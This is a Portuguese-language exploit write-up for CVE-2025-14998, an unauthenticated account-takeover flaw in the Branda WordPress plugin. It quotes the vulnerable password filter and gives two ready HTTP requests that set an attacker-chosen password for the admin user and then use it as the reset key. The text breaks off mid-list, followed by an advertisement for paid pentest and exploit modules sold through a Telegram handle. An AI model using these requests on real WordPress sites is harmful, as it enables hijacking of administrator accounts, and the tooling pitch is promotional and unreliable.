
CVE-2025-14998 Plugin Wordpress - Branda – White Label & Branding, Personalizador gratuito de página de login <= 3.4.24 - Escalada de privilégios não autenticada via tomada de conta
CVE-2025-14998 O plugin Branda para WordPress é vulnerável a escalação de privilégios via assunção de conta em todas as versões até a 3.4.24, inclusive. Isso se deve ao fato de o plugin não validar corretamente a identidade de um usuário antes de atualizar sua senha. Isso possibilita que atacantes não autenticados alterem senhas de usuários arbitrários, incluindo administradores, e aproveitem isso para obter acesso às suas contas.
Para mais vulnerabilidades WordPress e ferramentas exclusivas de pentest, entre em contato comigo no Telegram @KtN1990.
O plugin substitui a lógica de geração de senha do WordPress ao se conectar ao filtro
random_password. Em vez de permitir que o WordPress gere uma senha aleatória
segura, o plugin a substitui por uma entrada controlada pelo usuário.
public function password_random_password_filter( $password ) {
global $wpdb, $signup_password_use_encryption;
if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
$key = $_GET['key'];
} elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
$key = $_POST['key'];
}
if ( ! empty( $_POST['password_1'] ) ) {
$password = $_POST['password_1'];
} elseif ( ! empty( $key ) ) {
$signup = $wpdb->get_row(
$wpdb->prepare(
"SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
$key
)
);
if ( ! ( empty( $signup ) || $signup->active ) ) {
$meta = maybe_unserialize( $signup->meta );
if ( ! empty( $meta['password'] ) ) {
if ( 'yes' === $signup_password_use_encryption ) {
$password = $this->password_decrypt( $meta['password'] );
} else {
$password = $meta['password'];
}
}
}
}
return $password;
}
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded
user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password
O valor de password_1 pode ser qualquer string controlada pelo atacante.
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local
Nenhum acesso a e-mail ou token válido de redefinição de senha é necessário.
Um atacante não autenticado pode:

-🛡️ Ideal para: – Pesquisadores de segurança – Testadores de penetração – Hackers éticos
📦 Linha mantida com ~230 módulos legados de pesquisa; melhorias recentes no núcleo do scanner para estabilidade e detecção.
🎯 Finalidade: Fornecido estritamente para testes de segurança autorizados, educação, pesquisa defensiva e treinamento de red team. Esta versão não se destina a uso ilegal. A distribuição é controlada — acesso somente após verificação e assinatura de um Acordo de Uso Responsável / NDA.
-🛡 Política de acesso responsável (resumo):